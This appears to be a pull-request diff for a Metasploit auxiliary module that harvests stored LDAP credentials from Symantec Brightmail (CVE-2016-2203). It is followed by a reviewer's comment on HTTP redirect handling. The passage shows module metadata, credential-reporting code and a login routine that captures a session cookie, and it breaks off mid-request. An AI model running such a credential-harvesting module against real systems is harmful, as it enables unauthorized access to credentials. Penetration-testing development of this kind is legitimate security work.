modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb

```diff
@@ -0,0 +1,283 @@
+
+      },
+      'References'     =>
+        [
+          ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
+          ['CVE','2016-2203'],
+          ['BID','86137']
+        ],
+
+      'Author'         =>
+        [
+          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>'
+        ],
+       'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'SSLVersion' => 'TLS1',
+          'RPORT' => 443
+        },
+       'License'        => MSF_LICENSE,
+       'DisclosureDate' => "Dec 17 2015"
+    ))
+    register_options(
+      [
+        OptInt.new('TIMEOUT', [true, 'HTTPS connect/read timeout in seconds', 1]),
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with'])
+      ], self.class)
+    deregister_options('RHOST')
+  end
+
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def report_cred(opts)
+   service_data = {
+    address: opts[:ip],
+    port: opts[:port],
+    service_name: 'LDAP',
+    protocol: 'tcp',
+    workspace_id: myworkspace_id
+   }
+   credential_data = {
+    origin_type: :service,
+    module_fullname: fullname,
+    username: opts[:user],
+    private_data: opts[:password],
+    private_type: :password
+   }.merge(service_data)
+   login_data = {
+    last_attempted_at: DateTime.now,
+    core: create_credential(credential_data),
+    status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    proof: opts[:proof]
+   }.merge(service_data)
+
+   create_credential_login(login_data)
+  end
+
+  def auth(username, password, sid, last_login)
+    # Real JSESSIONID  cookie
+    sid2 = ''
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => '/brightmail/login.do',
+      'headers'   => {
+        'Referer' => "https://#{peer}/brightmail/viewLogin.do",
+        'Connection' => 'keep-alive'
+      },
+      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
+      'vars_post' => {
+        'lastlogin'  => last_login,
+        'userLocale' => '',
+        'lang'       => 'en_US',
+        'username'   => username,
+        'password'   => password,
+        'loginBtn'   => 'Login'
+      }
+    })
+   if res.body =~ /Logged in/
+      sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
+      return sid2
+   end
+   if res and res.headers['Location']
+     mlocation = res.headers['Location']
+     new_uri = res.headers['Location'].scan(/^http:\/\/[\d\.]+:\d+(\/.+)/).flatten[0]
+     res = send_request_cgi({
```

Comment:
Have you tried using send_request_cgi!() instead of doing the direction yourself?